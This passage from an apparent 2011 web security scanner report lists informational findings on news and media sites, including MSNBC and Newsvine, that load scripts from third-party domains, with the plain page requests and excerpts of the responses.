http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41324344/ns/world_news-south_and_central_asia HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.501. http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41324344/ns/world_news-south_and_central_asia/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41324344/ns/world_news-south_and_central_asia/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.502. http://www.msnbc.redacted/id/41324874/ns/us_news-weird_news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41324874/ns/us_news-weird_news

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41324874/ns/us_news-weird_news HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.503. http://www.msnbc.redacted/id/41324874/ns/us_news-weird_news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41324874/ns/us_news-weird_news/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41324874/ns/us_news-weird_news/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.504. http://www.msnbc.redacted/id/41324877/ns/world_news-europe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41324877/ns/world_news-europe

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41324877/ns/world_news-europe HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.505. http://www.msnbc.redacted/id/41324877/ns/world_news-europe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41324877/ns/world_news-europe/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41324877/ns/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.506. http://www.msnbc.redacted/id/41326456/ns/business-media_biz/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41326456/ns/business-media_biz/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7540
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41326456/ns/business-media_biz/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.507. http://www.msnbc.redacted/id/41326559/ns/local_news-dallasfort_worth_tx/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41326559/ns/local_news-dallasfort_worth_tx/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41326559/ns/local_news-dallasfort_worth_tx/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.508. http://www.msnbc.redacted/id/41326705/ns/world_news-south_and_central_asia previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41326705/ns/world_news-south_and_central_asia

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41326705/ns/world_news-south_and_central_asia HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.509. http://www.msnbc.redacted/id/41326705/ns/world_news-south_and_central_asia/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41326705/ns/world_news-south_and_central_asia/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41326705/ns/world_news-south_and_central_asia/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.510. http://www.msnbc.redacted/id/41327238/ns/us_news-crime_and_courts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41327238/ns/us_news-crime_and_courts/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41327238/ns/us_news-crime_and_courts/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.511. http://www.msnbc.redacted/id/41327694/ns/us_news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41327694/ns/us_news/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41327694/ns/us_news/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.512. http://www.msnbc.redacted/id/41327817/ns/world_news-mideastn_africa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41327817/ns/world_news-mideastn_africa/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7544
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41327817/ns/world_news-mideastn_africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.513. http://www.msnbc.redacted/id/41327817/ns/world_news-mideastn_africa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41327817/ns/world_news-mideastn_africa/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41327817/ns/world_news-mideastn_africa/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Pragma: no-cache
RTSS: 1
Expires: Sun, 30 Jan 2011 19:01:00 GMT
Date: Sun, 30 Jan 2011 19:01:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
Content-Length: 122609

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v=
...[SNIP]...
<link rel="image_src" href="http://msnbcmedia2.redacted/j/MSNBC/Components/Video/110129/nn_viq_wh_110129.standard.jpg" />
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
<script src='http://cache-01.cleanprint.net/cp/ccg?divId=2556' type='text/javascript'></script>
...[SNIP]...
</script><script type='text/javascript' src='http://service.collarity.com/cust/msnbc/ucs.js'></script>
...[SNIP]...
</script>
<script type="text/javascript "src="http://cdn.krxd.net/krux.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536"></script>
...[SNIP]...
</SCRIPT>
<SCRIPT SRC="http://an.tacoda.net/an/13015/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
</script>
<script src="http://an.tacoda.net/an/13015/slf.js" type="text/javascript"></script>
...[SNIP]...

23.514. http://www.msnbc.redacted/id/41327924/ns/world_news-europe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41327924/ns/world_news-europe/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41327924/ns/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.515. http://www.msnbc.redacted/id/41328059/ns/us_news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41328059/ns/us_news/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41328059/ns/us_news/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.516. http://www.msnbc.redacted/id/41328834/ns/world_news-europe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41328834/ns/world_news-europe/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41328834/ns/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.517. http://www.msnbc.redacted/id/41329947/ns/us_news-crime_and_courts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41329947/ns/us_news-crime_and_courts/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41329947/ns/us_news-crime_and_courts/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.518. http://www.msnbc.redacted/id/41330515/ns/us_news-life/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41330515/ns/us_news-life/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=7536
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41330515/ns/us_news-life/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.519. http://www.msnbc.redacted/id/41330876/ns/world_news-europe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/41330876/ns/world_news-europe/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://cdn.krxd.net/krux.js
http://msnbc.us.intellitxt.com/intellitxt/front.asp?ipid=27019
http://service.collarity.com/cust/msnbc/ucs.js

Request

GET /id/41330876/ns/world_news-europe/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.520. http://www.msnbc.redacted/id/8004316/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.msnbc.redacted
Path:	/id/8004316/

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.pulse360.com/281AD868-A95B-11DF-B5E2-BA6C3FF5047F
http://www.polls.newsvine.com/_vine/js/pierre?lib=jquery

Request

GET /id/8004316/ HTTP/1.1
Host: www.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.521. http://www.myhomeredacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myhomeredacted
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cetrk.com/pages/scripts/0009/2911.js
http://myhomemsn.vo.msecnd.net/js/s_code.js

Request

GET / HTTP/1.1
Host: www.myhomeredacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 24 Nov 2010 18:39:14 GMT
Accept-Ranges: bytes
ETag: "c26075e468ccb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:59:09 GMT
Connection: close
Content-Length: 19444

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...

   <script language="JavaScript" type="text/javascript" src="http://myhomemsn.vo.msecnd.net/js/s_code.js"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://cetrk.com/pages/scripts/0009/2911.js"> </script>
...[SNIP]...

23.522. http://www.nasawatch.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nasawatch.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://widgets.twimg.com/j/2/widget.js

Request

GET / HTTP/1.1
Host: www.nasawatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:12:31 GMT
Server: Apache/1.3.41 (Darwin) mod_ssl/2.8.31 OpenSSL/0.9.7l PHP/4.4.9 mod_perl/1.29
Cache-Control: max-age=60
Expires: Sun, 30 Jan 2011 03:13:31 GMT
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html
Content-Length: 96832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="six
...[SNIP]...
<div align="center">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

23.523. http://www.neudesicmediagroup.com/Advertising.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.neudesicmediagroup.com
Path:	/Advertising.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery.validate/1.7/jquery.validate.min.js?v=3
http://s18.sitemeter.com/js/counter.js?site=s18neumedia

Request

GET /Advertising.aspx HTTP/1.1
Host: www.neudesicmediagroup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.524. http://www.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET / HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:13:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=20d3e915c99117443eb51b0c141f325f; expires=Sat, 25-Jan-2031 03:13:58 GMT; path=/; domain=.newsvine.com
Cache-Control: no-store, private, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: sprout=2_cd9e4WPi9S8TA65nc4FRmISDbfld%2Bz1WpHy7rW3XmiijWVlFj9YKULk5rqZPYHTNzk9GF6CO7%2BXYkzPwgSOo13YhzbUSSyLOwO%2B6vGq3ySXmjD3Eg7P%2BQKpYWNqjYOuPuseiwN7bnR0vLsw97nbakOqq0wOdY0LAfFr8pXvFQl%2FEpbRgscYoYMKCLzqOimQzpLcu%2BPb3ZHvuf5qssV1%2Fch3eCPGUjyRGW%2BsBRftbD%2B1ztBgY4jcQ9ZW4CmzltUsM; expires=Sat, 25-Jan-2031 03:14:08 GMT; path=/; domain=.newsvine.com
Set-Cookie: vid=20d3e915c99117443eb51b0c141f325f; expires=Sat, 25-Jan-2031 03:14:08 GMT; path=/; domain=.newsvine.com
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 55258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.525. http://www.newsvine.com/_tools/user/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_tools/user/login

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /_tools/user/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:58:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=3670341b4e7c29240de918b35bcfb885; expires=Sat, 25-Jan-2031 01:58:04 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 17589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...

23.526. https://www.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
https://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/autocomplete/autocomplete-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/button/button-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/container/container-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/cookie/cookie-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/datasource/datasource-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/history/history-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/json/json-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/menu/menu-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/resize/resize-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/selector/selector-min.js
https://ajax.googleapis.com/ajax/libs/yui/2.7.0/build/utilities/utilities.js
https://ajax.googleapis.com/ajax/libs/yui/2.8.0/build/event-delegate/event-delegate-min.js

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:02:03 GMT
